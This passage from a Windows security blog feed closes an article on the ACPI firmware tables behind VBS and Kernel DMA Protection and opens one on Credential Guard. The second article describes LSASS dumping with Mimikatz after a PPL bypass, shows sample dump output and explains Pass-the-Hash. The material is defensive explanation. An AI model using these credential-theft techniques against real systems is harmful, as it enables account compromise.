The class of failures in which the table contents were *incorrect at firmware build* -- the OEM declared properties that do not hold, or the firmware authored a wide RMRR that overlaps sensitive memory, or the WSMT flags overstate the SMM hardening that actually shipped. Measured boot cannot detect this class because the measurement matches the baseline; the baseline itself is wrong.
&lt;p&gt;The freshness gap and the contents-correctness gap are independent failure modes, and they need independent mechanisms. Pluton solves the first. Nothing in the deployed Windows-on-OEM-firmware model solves the second; out-of-band certification (Secured-core PC) is the closest approximation, and it works only for the sample of devices Microsoft tests pre-ship.&lt;/p&gt;
&lt;p&gt;We can name the failures. So who is responsible for fixing each one? That is the lifecycle question.&lt;/p&gt;
&lt;h2&gt;8. The Lifecycle Question: Who Populates, Who Validates, Who Owns the Bug&lt;/h2&gt;
&lt;p&gt;The OS reads the tables. It does not write them. So who does, and who checks the writer&apos;s work?&lt;/p&gt;
&lt;h3&gt;Population&lt;/h3&gt;
&lt;p&gt;SDEV, WSMT, and WPBT entries are constructed by the OEM&apos;s UEFI BIOS team, sometimes via platform-controller-side helpers (Intel ME, AMD PSP) when secure-resource enumeration crosses platform-controller boundaries. DMAR is mostly built by the reference Independent BIOS Vendor code that ships with Intel and AMD reference designs (American Megatrends, Insyde, Phoenix -- the three IBVs listed in the public UEFI Forum membership directory [@uefi-forum-members]) and customised by the OEM. IORT is filled in by the System-on-Chip vendor&apos;s reference firmware on Arm (Qualcomm, Ampere, NVIDIA on Grace-class platforms). The table set is &lt;em&gt;assembled at firmware build time&lt;/em&gt;, not at boot. Once Windows is running, the tables are read-only; the only way to change them is to re-flash the firmware.&lt;/p&gt;
&lt;h3&gt;Validation, pre-ship&lt;/h3&gt;
&lt;p&gt;Pre-ship validation runs through the Windows Hardware Lab Kit and the Microsoft Hardware Compatibility Program. Secured-Core PC certification raises the bar de facto. Per the OEM Standards for highly secure Windows 11 devices page, Secured-Core requires Secure Boot enabled with the third-party UEFI CA not trusted by default; TPM 2.0 meeting the latest TCG requirements; &lt;em&gt;&quot;the device supports Memory Access Protection (Kernel DMA Protection)&quot;&lt;/em&gt; (i.e., DMAR / IVRS / IORT correctly authored); &lt;em&gt;&quot;System Guard Secure Launch (D-RTM) with System Management Mode (SMM) isolation&quot;&lt;/em&gt; OR &lt;em&gt;&quot;S-RTM and Standalone MM with MM supervisor (the approach implemented on FASR devices)&quot;&lt;/em&gt;; HVCI enabled; Windows Hello with Enhanced Sign-in Security (i.e., SDEV authored); and BitLocker [@oem-highly-secure-11]. WSMT-flags-asserted is checked transitively via the SMM-isolation requirement.&lt;/p&gt;

flowchart LR
    subgraph OEM
        P1[Build DMAR / IORT / WSMT / SDEV / WPBT at firmware build time]
        P2[Re-author on each BIOS update]
    end
    subgraph Microsoft
        V1[WHQL / HLK pre-ship validation]
        V2[Secured-Core PC certification]
        V3[Post-ship: ad-hoc research only]
    end
    subgraph Customer
        C1[Run msinfo32, Win32_DeviceGuard, Get-MpComputerStatus]
        C2[Author WDAC policy that constrains WPBT-injected binaries]
        C3[Apply OEM BIOS updates -- only path for table-content fixes]
    end
    P1 --&amp;gt; V1
    V1 --&amp;gt; V2
    V2 --&amp;gt; C1
    P2 --&amp;gt; C3
    V3 -.-&amp;gt; C2
&lt;h3&gt;Validation, post-ship&lt;/h3&gt;
&lt;p&gt;There is almost none, except via the WHQL driver flow and ad-hoc Microsoft research after a public disclosure. The 2021 Eclypsium WPBT-cert-validation finding triggered a Microsoft re-examination, and the response was a customer-side WDAC mitigation rather than an OS-side validator change [@eclypsium-wpbt]. The servicing-velocity problem is structural: ACPI table content cannot be patched by Windows Update; it requires a UEFI BIOS update from the OEM. The 2015 Lenovo Service Engine incident required Lenovo BIOS updates [@cisa-lse; @nvd-cve-2015-5684]; the Eclypsium finding could not wait for a comparable industry-wide BIOS-update wave, so Microsoft chose the WDAC path.&lt;/p&gt;
&lt;h3&gt;Servicing&lt;/h3&gt;
&lt;p&gt;OEM BIOS update is the only path for table-content fixes. OS-side WDAC is the only path for binary-execution constraints over WPBT. Pluton-rooted attestation is the only path for drift detection between firmware build and OS boot. The three are layered, not redundant: a defender who cares about the WPBT class needs all three.&lt;/p&gt;
&lt;h3&gt;The four open problems&lt;/h3&gt;
&lt;p&gt;The four open problems are not implementation details. They are structural negative spaces where no shipping mechanism today fills the gap.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;First, there is no industry-standard attestable claim that an OEM has actually implemented the SMM mitigations they declared in WSMT.&lt;/em&gt; The obvious direction is a Pluton-attested SMM-mitigation manifest: a hardware-rooted statement that the firmware that built the WSMT also includes the SMI-handler implementations that justify the flags. Not standardised today. The current WSMT flags are a free-text declaration the OEM may make for any reason; the only check is presence.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Second, SDEV does not name which trustlet a device should be routed to.&lt;/em&gt; The binding between an SDEV-listed device and the consuming trustlet (BioIso, LsaIso, vmsp) is encoded implicitly in Windows policy and OEM driver INFs. There is no extensibility story for future trustlets, and no way for a third-party trustlet to declare which SDEV entries it expects to consume. If Microsoft ships a new trustlet for Wi-Fi credentials in five years, SDEV cannot describe the binding without a spec revision.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Third, WPBT signing trust roots are not declared in the table.&lt;/em&gt; The implicit assumption was that any Authenticode-trusted certificate would do. The Eclypsium 2021 disclosure broke that assumption [@eclypsium-wpbt]. WDAC is the workaround; a fix would require WPBT to declare a narrower trust root the firmware vouches for, and the OS to enforce only that root. Such a change has not shipped.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Fourth, forged-table detection from the Secure Kernel is partial.&lt;/em&gt; Not all five security tables are measured into well-defined PCRs. The only narrowly-specified flow is the PCR[7] EV_EFI_ACTION &lt;em&gt;&quot;DMA Protection Disabled&quot;&lt;/em&gt; event Microsoft requires when DMA protection is downgraded [@oem-kernel-dma]. A unified &lt;em&gt;&quot;measured ACPI&quot;&lt;/em&gt; PCR -- e.g., PCR[5] extended with the hash of every security-bearing table at firmware load, paired with hypervisor-side enforcement that refuses to launch trustlets if the measurement does not match a known-good baseline -- is the obvious direction. It is not deployed.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The four open problems are: (1) no attestable claim that WSMT-declared SMM mitigations are actually implemented; (2) SDEV does not name the consuming trustlet; (3) WPBT signing trust roots are not declared in the table; (4) forged-table detection from VTL1 is partial. None of these is solved in shipping Windows in 2026. This is the live frontier of the firmware-OS contract.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Knowing the failure families and the lifecycle, what should you actually do on Monday morning? That is the practical guide.&lt;/p&gt;
&lt;h2&gt;9. Practical Guide: Inventory, Procurement, Defence&lt;/h2&gt;
&lt;p&gt;You are now equipped to read these tables on your own laptop and to argue procurement criteria with a vendor. Here is the operational toolkit.&lt;/p&gt;
&lt;h3&gt;Inventory commands&lt;/h3&gt;
&lt;p&gt;The fastest way to find out what is actually enabled on a Windows machine is a short PowerShell session followed by an optional Linux-side dump for the table contents themselves.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Command&lt;/th&gt;
&lt;th&gt;What it tells you&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;&lt;code&gt;Get-CimInstance -Namespace root\Microsoft\Windows\DeviceGuard -ClassName Win32_DeviceGuard&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;VBS / HVCI / Credential Guard state; the implicit witness for whether WSMT influence allowed VBS to start&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;msinfo32&lt;/code&gt; (System Summary pane)&lt;/td&gt;
&lt;td&gt;Kernel DMA Protection (DMAR / IVRS / IORT influence), Secure Boot State, Memory Integrity, Virtualization-based security state&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;`Get-PnpDevice -PresentOnly&lt;/td&gt;
&lt;td&gt;Where-Object { $_.Class -eq &quot;Biometric&quot; }`&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;Get-MpComputerStatus&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Defender state including AMSI providers, useful for cross-checking the WDAC-over-WPBT mitigation&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Linux: &lt;code&gt;sudo acpidump -b -o tables.acpi &amp;amp;&amp;amp; acpixtract -a tables.acpi &amp;amp;&amp;amp; iasl -d *.dat&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Dumps and disassembles the ACPI table set; you can read SDEV / WSMT / WPBT / DMAR / IORT in human form&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;A worked example brings the flags to life. Suppose you dump the tables on a Surface-class laptop. SDEV will list &lt;code&gt;\_SB.PCI0.GFX0.IRCM&lt;/code&gt; (the integrated infrared camera used by Windows Hello) with the Allow-Handoff bit clear -- the camera is owned by the Secure Kernel for the lifetime of the boot. WSMT will show &lt;code&gt;ProtectionFlags = 7&lt;/code&gt; (all three bits set: &lt;code&gt;FIXED_COMM_BUFFERS | COMM_BUFFER_NESTED_PTR_PROTECTION | SYSTEM_RESOURCE_PROTECTION&lt;/code&gt;). DMAR will show DRHD entries for each VT-d remapping unit and the Flags byte will have bit 2 (&lt;code&gt;DMA_CTRL_PLATFORM_OPT_IN_FLAG&lt;/code&gt;) set. WPBT may or may not be present; if present, you can extract &lt;code&gt;HandoffSize&lt;/code&gt; and the binary itself, and pass the binary to &lt;code&gt;signtool verify /pa /v&lt;/code&gt; to read its Authenticode chain.&lt;/p&gt;

```
PS&amp;gt; $g = Get-CimInstance -Namespace root\Microsoft\Windows\DeviceGuard -ClassName Win32_DeviceGuard
PS&amp;gt; &quot;VBS status: $($g.VirtualizationBasedSecurityStatus); services running: $($g.SecurityServicesRunning -join &apos;,&apos;)&quot;
```&lt;p&gt;&lt;code&gt;VirtualizationBasedSecurityStatus&lt;/code&gt;: 0 = off, 1 = enabled but not running, 2 = running. &lt;code&gt;SecurityServicesRunning&lt;/code&gt; is an array: 1 = Credential Guard, 2 = HVCI (Memory Integrity), 3 = System Guard Secure Launch, 4 = SMM Firmware Measurement. An array of [2, 3] means both HVCI and System Guard Secure Launch are active. A &lt;em&gt;1 / empty-array&lt;/em&gt; result is the classic &lt;em&gt;&quot;WSMT or another VBS prerequisite is missing&quot;&lt;/em&gt; signature.
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;
&lt;h3&gt;Procurement criteria for a security-conscious buyer&lt;/h3&gt;
&lt;p&gt;The procurement conversation is the most consequential one a defender can have. The five table set is not patchable from Windows Update; if you bought wrong, you are stuck with it for the device&apos;s lifetime. The criteria worth pinning down before you sign a purchase order:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Criterion&lt;/th&gt;
&lt;th&gt;What it guarantees&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Secured-Core PC certification&lt;/td&gt;
&lt;td&gt;DMAR / IVRS / IORT present and correctly authored, Memory Access Protection enrollable, WSMT flags asserted, SDEV populated for biometrics, HVCI on, BitLocker on [@oem-highly-secure-11]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;BIOS option to disable WPBT&lt;/td&gt;
&lt;td&gt;Customer-side opt-out from the WPBT class without relying on WDAC&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;IORT presence on Arm laptops&lt;/td&gt;
&lt;td&gt;Confirms SMMU-on-by-default in firmware (Snapdragon X / Surface Pro X-class)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Vendor BIOS-update SLA covering ACPI security tables&lt;/td&gt;
&lt;td&gt;Predictable patch cadence for the tables that cannot be Windows-Updated&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Pluton-as-TPM option&lt;/td&gt;
&lt;td&gt;Closes the LPC-bus eavesdropping gap and supports PCR-based table measurement [@ms-pluton]&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;h3&gt;Defender-side Monday-morning actions&lt;/h3&gt;
&lt;p&gt;Three actions are worth doing on the next available maintenance window.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Deploy a WDAC policy that constrains WPBT-injected binaries.&lt;/em&gt; This is Microsoft&apos;s recommended Eclypsium mitigation [@eclypsium-wpbt]. The App Identity sibling article walks WDAC authoring in detail [@app-identity-sibling]. Even a permissive policy that requires a specific signing root for WPBT binaries (e.g., your OEM&apos;s production cert, no others) eliminates the revoked-cert-attack class.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Verify that Memory Integrity, VBS, and Credential Guard are actually running, not just supported.&lt;/em&gt; Run &lt;code&gt;Win32_DeviceGuard.SecurityServicesRunning&lt;/code&gt; across your fleet and alert on machines where the array is empty but &lt;code&gt;VirtualizationBasedSecurityStatus = 1&lt;/code&gt;. That signature is the classic &lt;em&gt;&quot;the prerequisites are not met&quot;&lt;/em&gt; outcome -- often WSMT.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Snapshot the ACPI table set on managed endpoints; alert on deltas across BIOS updates.&lt;/em&gt; A WPBT delta that does not correspond to a documented BIOS-update changelog entry is a SOC alert. So is the appearance or removal of an SDEV entry between two consecutive boots. Most enterprise firmware tooling can do this; if yours cannot, the Linux-side &lt;code&gt;acpidump | acpixtract | iasl -d&lt;/code&gt; pipeline is a workable fallback.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; For high-value endpoints, treat &lt;code&gt;Kernel DMA Protection: Off&lt;/code&gt; in &lt;code&gt;msinfo32&lt;/code&gt; as a SOC alert worth chasing, not a tolerable default. The remediation is usually a UEFI menu (turn on VT-d) or a BIOS update (fix DMAR authoring), not a Windows operation. The five minutes spent enabling it are worth more than the next quarter of EDR alerts.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Two final operational anchors round out the article: a frequently-asked-questions block you can hand to a colleague, and a closing study guide for revision.&lt;/p&gt;
&lt;h2&gt;10. FAQ and Closing&lt;/h2&gt;
&lt;h3&gt;A few questions a colleague will ask&lt;/h3&gt;

Mostly no on enterprise SKUs. You may lose an OEM tracking agent, a warranty-recovery utility, or a vendor-supplied dock-firmware updater. Microsoft does not document a supported way to disable WPBT consumption from inside Windows [@eclypsium-wpbt], so the BIOS toggle (where the OEM offers it) is the cleanest path. On a managed enterprise fleet where the recovery flow is owned by IT and the OEM utility is not load-bearing, the cost is usually zero and the security benefit is the entire WPBT class.

Yes. That is exactly the point of the table. A device listed in SDEV with the Allow-Handoff bit clear is owned by the Secure Kernel for the lifetime of the boot; non-secure-OS code, including the Windows kernel, cannot reach it [@acpi-65-sdev]. The companion article on VBS trustlets walks the partitioning mechanics for the BioIso, LsaIso, and vmsp trustlets [@vbs-trustlets-sibling]. Caveat: if SDEV does not list the device, the Secure Kernel never takes ownership, and the device is owned by the normal kernel by default.

VBS will likely de-feature, and you may not be able to enable Credential Guard or HVCI. Severity depends on what you are using the device for. Microsoft Learn names WSMT compliance with the corresponding Protection Flags asserted as a hard prerequisite for VBS launch [@oem-vbs]. On a developer workstation that handles no production credentials, the practical impact may be modest. On a laptop a domain administrator carries to a coffee shop, the practical impact is a lot of post-exploitation primitives that were supposed to be blocked.

Not on its own. Windows runs the binary. The mitigations are a Windows Defender Application Control policy that constrains what WPBT may execute [@eclypsium-wpbt] or a BIOS option to disable WPBT consumption (where the OEM offers it). Until the WPBT signature validator changes -- which Microsoft has not committed to -- there is no Windows-side mechanism that refuses an attacker-signed binary if the certificate is technically Authenticode-valid (even if revoked).

ACPI&apos;s design point in 1996 was that the OS abstracts away platform variance via OEM-declared tables. The same property that lets a single Windows binary run on a thousand SKUs is the property that puts the OEM on the trust path. The trade-off has been visible since 1996 [@wikipedia-acpi]. The alternative architecture -- a vendor-controlled hardware-and-software stack like Apple&apos;s Mac silicon, where the same vendor controls both ends -- closes the contents-correctness gap by collapsing the OEM and the OS into a single entity. It also collapses the customer-choice space.

All three describe an IOMMU. DMAR is the table for Intel VT-d; IVRS is the table for AMD-Vi; IORT is the table for the Arm SMMU. They are mutually exclusive on a given platform; a laptop ships with exactly one of them depending on the silicon vendor. All three are first-class for Kernel DMA Protection, and the OEM opt-in flag lives in a different field of each [@oem-kernel-dma].

Partial. The TCG Platform Configuration Register framework supports the idea, and Microsoft requires PCR[7] EV_EFI_ACTION events when DMA protection is downgraded [@oem-kernel-dma], but a unified measured-ACPI PCR -- one that extends every security-bearing table at firmware load and lets the hypervisor refuse to launch trustlets when the measurement does not match a known-good baseline -- is not standardised today. This is the live frontier; the Pluton sibling article tracks the silicon-attestation context [@pluton-sibling].
&lt;h3&gt;Closing&lt;/h3&gt;
&lt;p&gt;This article is the substrate for the rest of the Windows platform-security series. The hypervisor-as-isolation-primitive [@hyperv-sibling] runs only when WSMT lets it. The trustlets that run inside the Secure Kernel [@vbs-trustlets-sibling] reach SDEV-listed devices and only those. Pluton-as-TPM [@pluton-sibling] and the discrete TPM [@tpm-sibling] anchor the measured-boot chain that, in principle, could detect a forged ACPI table -- and in practice, today, detects exactly one downgraded-DMA-protection event in PCR[7]. BitLocker [@bitlocker-sibling] seals against PCR values that are themselves measurements of the firmware that built the table set. Secure Boot [@secure-boot-sibling] verifies the bootloader that reads the table set; LogoFAIL showed that the firmware &lt;em&gt;underneath&lt;/em&gt; Secure Boot can patch the tables before Secure Boot&apos;s verifier fires. Application identity and code integrity policy [@app-identity-sibling] is the only customer-side lever for the WPBT class. USB device-arrival policy [@plug-and-trust-sibling] is the only customer-side lever for the runtime portion of the DMA class.&lt;/p&gt;
&lt;p&gt;Every guarantee those articles describe rests on five tables the firmware writes and the OS trusts. You now know the names of the tables, the names of the failure families, and the inventory commands to read them on your own machine. The next time you see &lt;code&gt;Kernel DMA Protection: Off&lt;/code&gt; in &lt;code&gt;msinfo32&lt;/code&gt;, you will know what is missing, who can fix it, and why it matters more than the EDR vendor&apos;s marketing slide implied. The next time someone tells you their Secured-Core PC is rootkit-proof, you will know which 52-byte table to ask about.&lt;/p&gt;
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;2026-05-11-the-acpi-tables-that-quietly-secure-your-windows-machine&quot; keyTerms={[
  { term: &quot;ACPI&quot;, definition: &quot;Advanced Configuration and Power Interface; the firmware-written, OS-read table format that describes a platform&apos;s non-discoverable devices and capabilities&quot; },
  { term: &quot;DMAR&quot;, definition: &quot;DMA Remapping Reporting Table; the Intel VT-d ACPI table that describes the IOMMU translation contexts and remapping units&quot; },
  { term: &quot;IORT&quot;, definition: &quot;I/O Remapping Table; the Arm-side ACPI 6.0+ analogue of DMAR, describing SMMU translation contexts and GIC ITS interrupt routing&quot; },
  { term: &quot;IVRS&quot;, definition: &quot;I/O Virtualization Reporting Structure; the AMD-Vi ACPI table for IOMMU description on AMD platforms&quot; },
  { term: &quot;WSMT&quot;, definition: &quot;Windows SMM Security Mitigations Table; a 40-byte ACPI table (36-byte header + 4-byte ProtectionFlags) whose 32-bit ProtectionFlags field declares OEM warranties about SMI-handler behaviour&quot; },
  { term: &quot;SDEV&quot;, definition: &quot;Secure Devices Table; an ACPI 6.2+ table that lists devices the firmware believes should be partitioned into the Secure Kernel&quot; },
  { term: &quot;WPBT&quot;, definition: &quot;Windows Platform Binary Table; an ACPI table whose body is a physical pointer to a binary Windows executes at SYSTEM on every boot&quot; },
  { term: &quot;SMM&quot;, definition: &quot;System Management Mode; an x86 CPU mode entered via SMI that runs in SMRAM with full physical-memory access, opaque to the OS&quot; },
  { term: &quot;Confused deputy&quot;, definition: &quot;An attack class where a less-privileged caller induces a more-privileged subject to perform unintended actions via attacker-controlled inputs the subject does not validate&quot; },
  { term: &quot;RMRR / RMR&quot;, definition: &quot;Reserved Memory Region Reporting (DMAR) / Reserved Memory Region (IORT); identity-mapped memory windows the firmware declares for legitimate firmware-DMA needs&quot; },
  { term: &quot;Trustlet&quot;, definition: &quot;A user-mode process running in VTL1 (the Secure Kernel&apos;s address space); Windows ships several including BioIso, LsaIso, and vmsp&quot; },
  { term: &quot;Freshness gap&quot;, definition: &quot;The class of failures where an ACPI table changes between firmware build and OS parse; closed by Pluton-rooted measured boot&quot; },
  { term: &quot;Contents-correctness gap&quot;, definition: &quot;The class of failures where an ACPI table&apos;s contents were incorrect at firmware build; not closed by measured boot&quot; }
]} questions={[
  { q: &quot;What is the ProtectionFlags value that declares all three WSMT mitigations asserted, and what does each bit mean?&quot;, a: &quot;0x7. Bit 0 (FIXED_COMM_BUFFERS) warrants that all SMI communication buffers live in fixed firmware-allocated memory; bit 1 (COMM_BUFFER_NESTED_PTR_PROTECTION) warrants that nested pointers inside those buffers are validated against the same allowed regions; bit 2 (SYSTEM_RESOURCE_PROTECTION) warrants that critical platform resources are guarded from unintended SMM modification.&quot; },
  { q: &quot;Why is Microsoft&apos;s WSMT documentation explicit that the table is &apos;attestable but not enforceable&apos; from inside Windows?&quot;, a: &quot;Because SMM runs at a higher privilege than any code Windows can execute, and SMRAM is not addressable to the OS. Windows can read the WSMT Protection Flags but cannot run a test that verifies whether the underlying SMI handlers actually implement the warranted protections; only the OEM&apos;s pre-ship validation can confirm that.&quot; },
  { q: &quot;What was the Eclypsium 2021 finding about WPBT, and what was Microsoft&apos;s recommended mitigation?&quot;, a: &quot;Microsoft&apos;s WPBT signature validator accepted expired and revoked code-signing certificates; the researchers signed a malicious binary with a 2015-revoked Hacking Team certificate and ran it at SYSTEM on a Secured-Core PC. Microsoft&apos;s recommended mitigation was for customers to deploy a Windows Defender Application Control policy that constrains binaries WPBT may execute, rather than fixing the WPBT signature validator itself.&quot; },
  { q: &quot;Why does Kernel DMA Protection silently disable on some VT-d-capable laptops?&quot;, a: &quot;Because the AND-gate has multiple inputs: DMAR must be present, the DMA_CTRL_PLATFORM_OPT_IN_FLAG bit (bit 2 of the DMAR Flags byte) must be set, the IOMMU must be enabled in firmware setup, and the device driver must declare DMA-remapping compatibility (per-device RemappingSupported INF directive on Windows 24H2+). Any one of those failing turns it off, and the firmware-controlled inputs require an OEM BIOS update to fix.&quot; },
  { q: &quot;What is the difference between the freshness gap and the contents-correctness gap, and which one does Pluton-rooted measured boot close?&quot;, a: &quot;The freshness gap is the class of failures where an ACPI table changes between firmware build and OS parse; Pluton-rooted measured boot closes it because PCR measurements at boot will not match the known-good baseline. The contents-correctness gap is the class where the table contents were incorrect at firmware build; measured boot cannot close it because the measurement matches the (incorrect) baseline. Only out-of-band certification (Secured-Core PC) approximates a fix.&quot; }
]} /&amp;gt;&lt;/p&gt;
</content:encoded><category>windows-security</category><category>acpi</category><category>firmware</category><category>vbs</category><category>kernel-dma-protection</category><category>wpbt</category><category>sdev</category><category>wsmt</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>The Empty Hash: Credential Guard, the LsaIso Trustlet, and the Eleven-Year LSASS Extraction Tradition</title><link>https://paragmali.com/blog/the-empty-hash-credential-guard-the-lsaiso-trustlet-and-the-/</link><guid isPermaLink="true">https://paragmali.com/blog/the-empty-hash-credential-guard-the-lsaiso-trustlet-and-the-/</guid><description>Why a 2026 Mimikatz dump returns [LSA Isolated Data] instead of an NTLM hash, what LsaIso.exe really computes, and the five things Credential Guard was never going to close.</description><pubDate>Mon, 11 May 2026 00:00:00 GMT</pubDate><content:encoded>
**Credential Guard moves the long-lived NTLM hash and the Kerberos long-term key out of `lsass.exe` (in the VTL0 NT kernel) and into `LsaIso.exe` (in VTL1, behind the hypervisor).** The hash is no longer in the dump because the hash is no longer in the process. Default-on for domain-joined, non-domain-controller Windows 11 22H2+ and Windows Server 2025 systems that meet the hardware requirements [@ms-cg-overview]. The architecture closes the eleven-year LSASS-memory-dump class. It does not close credential **use** (Kerberoast [@attack-kerberoast]), token impersonation (the PrintSpoofer / Potato chain [@itm4n-printspoofer]), plaintext-secret protocols [@ms-cg-considerations] (NTLMv1, MS-CHAPv2, Digest, CredSSP), or the trustlet&apos;s own RPC output (Pass-the-Challenge, December 2022 [@lyak-passchallenge-wayback]). This is the deep look at the canonical VBS trustlet -- the encrypted-blob fields, the IUM API surface, the five residual attack classes, and Microsoft&apos;s own honest accounting of what Credential Guard was never going to protect.
&lt;h2&gt;1. The 3:14 a.m. Mimikatz that returned an empty hash&lt;/h2&gt;
&lt;p&gt;It is 3:14 a.m. on a 2026 Windows 11 24H2 box. The operator has SYSTEM. The operator has &lt;code&gt;SeDebugPrivilege&lt;/code&gt;. The operator has bypassed Protected Process Light the way PPLdump [@github-ppldump] did in 2021, has dumped &lt;code&gt;lsass.exe&lt;/code&gt; with &lt;code&gt;sekurlsa::logonpasswords&lt;/code&gt; from Mimikatz [@github-mimikatz], and is staring at the screen.&lt;/p&gt;
&lt;p&gt;For the nine years before mid-2015, the next line on that screen would have been the user&apos;s NTLM hash. Tonight, the next line is something else entirely.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; &lt;code&gt;msv : [00000003] Primary * Username : alice * Domain   : CONTOSO * NTLM     : [LSA Isolated Data] Is NT Present: True Context Handle: 0x1b6d5216c60 Proxy Info: 0x7ffdd8bfd380 Encrypted blob: a000000000000000080000006400000001000000010100000100000036...4e746c6d48617368... DPAPI: c02c86e371103ad7d7d352b19af1a74a00000000&lt;/code&gt; Structurally identical to the PassTheChallenge README [@github-passthechallenge] example, with username and domain renamed for narrative clarity. Hex prefix, field names, and embedded &lt;code&gt;NtlmHash&lt;/code&gt; ASCII tag are verbatim. This is the artefact that tells the operator the architectural shift happened.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The literal string &lt;code&gt;[LSA Isolated Data]&lt;/code&gt; sits where the NTLM hash used to sit. The hex prefix &lt;code&gt;a000000000000000&lt;/code&gt; is the same prefix on every Credential-Guard-protected box on the planet. The trailing ASCII tag &lt;code&gt;4e746c6d48617368&lt;/code&gt; decodes to &lt;code&gt;NtlmHash&lt;/code&gt;: the field name survives, the value does not.&lt;/p&gt;
&lt;p&gt;This article is the deep look at the canonical VBS trustlet that is responsible for that empty hash. It is the companion piece to the broader VBS trustlets treatment in this series [@paragmali-com-secure-kernel], which uses &lt;code&gt;LsaIso.exe&lt;/code&gt; as its running example without unfolding the four things that matter most about it: the eleven-year extraction history that motivated the design; what &lt;code&gt;LsaIso.exe&lt;/code&gt; actually computes and what every field of the encrypted blob means; Pass-the-Challenge -- the residual class Credential Guard was never going to close; and the honest, Microsoft-documented limits [@ms-cg-howitworks], enumerated.&lt;/p&gt;
&lt;p&gt;A note on intent and verification: this is defensive research. Every primary source was verified live on 2026-05-11, against the public web; every command and tool named is in the open-source security canon, used today by Microsoft&apos;s own product teams, by enterprise red teams, and by every blue team that takes the storage-versus-use distinction seriously.&lt;/p&gt;
&lt;p&gt;The hash is not in the dump because the hash is no longer in the process. Where it went, and why Microsoft moved it, is twenty-two years of &lt;code&gt;lsass.exe&lt;/code&gt; history.&lt;/p&gt;
&lt;h2&gt;2. Why LSASS became the single highest-value memory dump on Windows (1993--2014)&lt;/h2&gt;
&lt;p&gt;Twenty-two years before the empty hash, &lt;code&gt;lsass.exe&lt;/code&gt; shipped in Windows NT 3.1. It was not, at first, the most-attacked process on Windows. It became that, slowly, over the course of eleven years and one tool. This is the tradition the trustlet was built to break.&lt;/p&gt;

The user-mode Windows service that handles interactive logon, NTLM challenge-response, Kerberos AS/TGS exchanges, security-policy enforcement, password changes, and the loading of every Security Support Provider DLL the system uses for authentication. Until Credential Guard, it also held every long-lived authentication secret for every signed-in user in its own process memory, because the protocols it implemented required the secret to be present when the network talked to it. See the canonical LSA Authentication [@ms-lsa-authentication] reference.
&lt;p&gt;The architectural reason &lt;code&gt;lsass.exe&lt;/code&gt; had to hold the secret is structural to the protocols it speaks. NTLM [@paragmali-com-in-windows] and Kerberos are challenge-response protocols. The server sends a challenge; the client encrypts the challenge with a key derived from the password; the server compares. The key the client uses is not the password itself but the NT one-way function output (NTOWF) [@wiki-pth] -- the MD4 of the UTF-16-LE password. For Kerberos the client uses a long-term key (DES, RC4, or AES) derived from the password under a protocol-defined string-to-key function [@en-wikipedia-org-wiki-kerberosprotocol]). In both cases the server expects the client to prove possession of a value that is functionally equivalent to the password, every time the client authenticates.&lt;/p&gt;

The MD4 hash of the UTF-16-LE encoded password. Despite the name, NTOWF is one-way only with respect to the original password. With respect to the network, the NTOWF *is* the credential: any process that holds it can compute the response to any NTLM challenge any server will ever issue, with no further information about the user.
&lt;p&gt;For single-sign-on to work -- the user types the password once, the OS uses it transparently for every later authentication that day -- something has to remember that derived value, in clear, in a process that wakes up whenever a remote service asks the kernel to authenticate. That something is &lt;code&gt;lsass.exe&lt;/code&gt;. Until 2015, &quot;remembers&quot; meant &quot;holds the bytes in process memory.&quot;The phrase &quot;the hash is the password&quot; is not a metaphor. The NTLM challenge-response computation &lt;code&gt;DESL(NTOWF, challenge)&lt;/code&gt; (three separate DES encryptions on 7-byte key segments per MS-NLMP section 3.3.1) accepts the NTOWF directly. An attacker who holds the NTOWF and can reach a server that speaks NTLM does not need to know the password at all. This is the &lt;em&gt;structural&lt;/em&gt; reason Pass-the-Hash works on every NTLM-speaking service in the network.&lt;/p&gt;
&lt;h3&gt;The eight inflection points&lt;/h3&gt;
